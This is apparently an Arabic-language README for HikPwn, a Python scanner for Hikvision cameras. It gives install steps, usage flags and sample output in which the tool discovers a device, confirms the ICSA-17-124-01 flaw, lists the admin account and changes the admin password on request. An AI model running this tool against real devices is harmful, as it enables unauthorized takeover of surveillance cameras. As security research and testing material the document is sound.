
هيك بون (HikPwn)، ماسح ضوئي بسيط لأجهزة هايكفيجن (Hikvision) مع قدرات أساسية لفحص الثغرات مكتوب بلغة بايثون 3.8.
هيك باون، ماسح ضوئي بسيط لأجهزة هيكفيجن مع قدرات مسح الثغرات الأساسية مكتوب بلغة بايثون 3.8. ولد هذا المشروع بدافع الفضول أثناء التقاطي ومشاهدتي لحركة المرور على الشبكة الناتجة عن بعض برامج وأجهزة هيكفيجن.
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
العمل قيد التقدم... ترقبوا!
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active] [--ICSA_17_124_01]
HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.
optional arguments:
-h, --help show this help message and exit
--interface INTERFACE the network interface to use
--address ADDRESS the ip address of the selected network interface
--active enable "active" discovery
--ICSA_17_124_01 enable ICSA-17-124-01 detection on discovered devices
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...
[*] Started 30 seconds of both passive and active discovery...
================================================================================
[*] Total detected devices: 1
XXX.XXX.XXX.XX
================================================================================
[*] Active discovery's results:
DEVICE #1:
LABEL DATA
--------------------------------------------------
Serial Number xxxxxxxxxxxxxxxxxxxxx
Description DS-2DE4220IW-D
MAC XX:XX:XX:XX:XX:XX
IP XXX.XXX.XXX.XX
DHCP in use false
Software Version V5.4.3build 160810
DSP Version V7.3 build 160801
Boot Time 2019-03-01 00:05:33
Activation Status true
Password Reset Ability true
================================================================================
[*] Passive discovery's results:
DEVICE #1:
Detected a device with ip address XXX.XXX.XXX.XX and MAC address XX:XX:XX:XX:XX:XX.
================================================================================
[*] Starting scan for ICSA-17-124-01...
Checking if XXX.XXX.XXX.XX is vulnerable to ICSA-17-124-01 and if we can get a list of valid users present on the device...
XXX.XXX.XXX.XX is vulnerable to ICSA_17_124_01. Recovered user list:
user_id 1
user_name admin
priority high
user_level Administrator
Do you want to exploit the vulnerability and try to change admin's password? (y/n)
>>> y
Enter a password composed by numbers and letters (8-12 characters):
>>>
Password change successful.
هذا المشروع للأغراض التعليمية فقط. لا تستخدمه في أنشطة غير قانونية. أنا لا أدعم ولا أقر الأفعال غير القانونية أو غير الأخلاقية ولا يمكن تحميل المسؤولية عن سوء استخدام هذا البرنامج.